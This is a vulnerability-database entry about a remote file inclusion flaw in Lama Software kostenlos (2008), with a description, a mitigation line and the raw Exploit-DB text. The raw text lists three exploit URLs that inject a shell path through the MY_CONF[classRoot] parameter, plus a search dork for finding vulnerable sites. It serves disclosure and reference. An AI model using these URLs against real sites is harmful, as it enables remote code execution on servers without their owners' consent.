Lama Software kostenlos Remote file include

vendor:

kostenlos

by:

QTRinux

8.8

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: kostenlos

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Lama Software kostenlos Remote file include

Lama Software kostenlos is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

[+]----------------------------------------------------------------------------[+]
 Lama Software kostenlos  Remote file include
Scripts         : Lama Software kostenlos
Discovered By   : QTRinux
Scripts site    : http://www.lama-software.de/
Thanks To       : # Tryag.cc # cold z3ro HackTeach.org # AlQaTaRi # Mr.sh4r3s # POISON #
site        : www.TRYAG.CC
dork        : Â© 2007 by Lama Software - Accomm Solutions GmbH & Co. KG
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
admin/functions/inc.steps.access_error.php?MY_CONF[classRoot]=Shell
admin/functions/inc.steps.check_login.php?MY_CONF[classRoot]=Shell
admin/functions/inc.steps.init_system.php?MY_CONF[classRoot]=Shell
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2008-01-21]